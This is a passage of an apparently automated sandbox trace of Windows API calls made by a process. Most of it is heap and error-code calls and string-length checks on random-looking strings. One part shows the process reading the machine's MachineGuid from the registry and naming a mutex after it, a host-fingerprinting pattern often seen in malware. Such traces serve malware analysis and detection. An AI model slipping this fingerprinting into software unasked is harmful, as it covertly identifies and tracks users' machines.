(HeapHandle=0x1dc0000, Flags=0x8, Size=0xf) returned 0x1dc1fe8 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x16) returned 0x1dc2000 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x2a) returned 0x1dc2020 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x29) returned 0x1dc2058 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x15) returned 0x1dc2090 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x1e) returned 0x1dc20b0 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x2a) returned 0x1dc20d8 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x12) returned 0x1dc2110 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x18) returned 0x1dc2130 [0088.681] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x46) returned 0x1dc2150 [0088.681] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc11f8 | out: hHeap=0x1dc0000) returned 1 [0088.682] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x80) returned 0x1dc11f8 [0088.682] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x8, Size=0x800) returned 0x1dc21a0 [0088.682] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0088.682] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.682] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x46669f) returned 0x0 [0088.683] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.684] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.685] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.685] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.686] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.686] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.687] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.687] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.687] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.688] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.688] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.689] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.689] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.690] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.691] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.692] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.692] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.693] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.694] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.694] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.695] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.696] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.696] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.697] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.697] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.698] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.699] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.699] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.699] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.700] RtlSizeHeap (HeapHandle=0x1dc0000, Flags=0x0, MemoryPointer=0x1dc11f8) returned 0x80 [0088.700] GetLastError () returned 0x0 [0088.700] SetLastError (dwErrCode=0x0) [0088.700] GetLastError () returned 0x0 [0088.701] SetLastError (dwErrCode=0x0) [0088.701] GetLastError () returned 0x0 [0088.701] SetLastError (dwErrCode=0x0) [0088.701] GetLastError () returned 0x0 [0088.701] SetLastError (dwErrCode=0x0) [0088.701] GetLastError () returned 0x0 [0088.701] SetLastError (dwErrCode=0x0) [0088.701] GetLastError () returned 0x0 [0088.702] SetLastError (dwErrCode=0x0) [0088.702] GetLastError () returned 0x0 [0088.702] SetLastError (dwErrCode=0x0) [0088.702] GetLastError () returned 0x0 [0088.702] SetLastError (dwErrCode=0x0) [0088.702] GetLastError () returned 0x0 [0088.702] SetLastError (dwErrCode=0x0) [0088.702] GetLastError () returned 0x0 [0088.703] SetLastError (dwErrCode=0x0) [0088.703] GetLastError () returned 0x0 [0088.703] SetLastError (dwErrCode=0x0) [0088.703] GetLastError () returned 0x0 [0088.703] SetLastError (dwErrCode=0x0) [0088.703] GetLastError () returned 0x0 [0088.703] SetLastError (dwErrCode=0x0) [0088.703] GetLastError () returned 0x0 [0088.704] SetLastError (dwErrCode=0x0) [0088.704] GetLastError () returned 0x0 [0088.704] SetLastError (dwErrCode=0x0) [0088.704] GetLastError () returned 0x0 [0088.704] SetLastError (dwErrCode=0x0) [0088.704] GetLastError () returned 0x0 [0088.704] SetLastError (dwErrCode=0x0) [0088.704] GetLastError () returned 0x0 [0088.704] SetLastError (dwErrCode=0x0) [0088.705] GetLastError () returned 0x0 [0088.705] SetLastError (dwErrCode=0x0) [0088.705] GetLastError () returned 0x0 [0088.705] SetLastError (dwErrCode=0x0) [0088.705] GetLastError () returned 0x0 [0088.705] SetLastError (dwErrCode=0x0) [0088.705] GetLastError () returned 0x0 [0088.705] SetLastError (dwErrCode=0x0) [0088.705] GetLastError () returned 0x0 [0088.784] SetLastError (dwErrCode=0x0) [0088.784] GetLastError () returned 0x0 [0088.784] SetLastError (dwErrCode=0x0) [0088.784] GetLastError () returned 0x0 [0088.784] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.785] GetLastError () returned 0x0 [0088.785] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.786] SetLastError (dwErrCode=0x0) [0088.786] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.787] SetLastError (dwErrCode=0x0) [0088.787] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.788] GetLastError () returned 0x0 [0088.788] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.789] GetLastError () returned 0x0 [0088.789] SetLastError (dwErrCode=0x0) [0088.847] GetCurrentHwProfileA (in: lpHwProfileInfo=0x18f338 | out: lpHwProfileInfo=0x18f338) returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc1280 [0088.849] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f1a8 | out: phkResult=0x18f1a8*=0xa0) returned 0x0 [0088.849] RegQueryValueExA (in: hKey=0xa0, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x18f2b0, lpcbData=0x18f1ac*=0xff | out: lpType=0x0, lpData=0x18f2b0*=0x30, lpcbData=0x18f1ac*=0x25) returned 0x0 [0088.849] RegCloseKey (hKey=0xa0) returned 0x0 [0088.849] CharToOemA (in: pSrc="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", pDst=0x18f1b0 | out: pDst="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x30) returned 0x1dc12b8 [0088.849] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x50) returned 0x1dc12f0 [0088.849] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12b8 | out: hHeap=0x1dc0000) returned 1 [0088.850] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f{846ee340-7039-11de-9d20-806e6f6e6963}") returned 0xa0 [0088.850] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc12f0 | out: hHeap=0x1dc0000) returned 1 [0088.850] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc1280 | out: hHeap=0x1dc0000) returned 1 [0088.850] GetLastError () returned 0x0 [0088.850] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x371a30 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.850] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0088.851] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x371a48 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0088.851] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x371a60 [0088.851] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.851] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.851] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.851] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0088.852] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x310930 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.852] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0088.853] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x371a78 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.853] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.854] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.854] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.854] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0088.854] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x371a90 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] lstrlenA (lpString="22U53309S") returned 9 [0088.854] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x373e58 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.854] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0088.855] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x373e80 [0088.855] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.855] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.855] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.855] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.856] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.857] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.857] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.857] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.857] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0088.857] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x374900 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] lstrlenA (lpString="5XGGXGUGH8OWOJH") returned 15 [0088.857] LocalAlloc (uFlags=0x40, uBytes=0x4b) returned 0x374188 [0088.857] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.857] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.857] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.857] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0088.858] lstrlenA 